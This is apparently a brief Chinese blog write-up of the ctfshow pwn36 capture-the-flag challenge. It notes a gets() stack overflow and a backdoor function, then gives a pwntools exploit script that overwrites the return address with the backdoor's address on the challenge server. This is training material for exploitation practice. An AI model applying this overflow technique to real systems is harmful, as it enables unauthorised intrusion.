pwnlearning

ctfshow | pwn36

1.checksec
图片

2.IDA
ctfshow函数,gets漏洞函数,栈溢出,覆盖0x28+4字节
图片

后门函数
图片

地址
图片

exp:

点击查看代码
from pwn import *
context(arch='i386', os='linux', log_level='debug')

p= remote('pwn.challenge.ctf.show', 28142)

payload = b"A"*(0x28+4)+p32(0x8048586)
p.sendline(payload)

p.interactive()

posted on 2025-07-25 12:06  邪恶的帽子  阅读(16)  评论(0)    收藏  举报

导航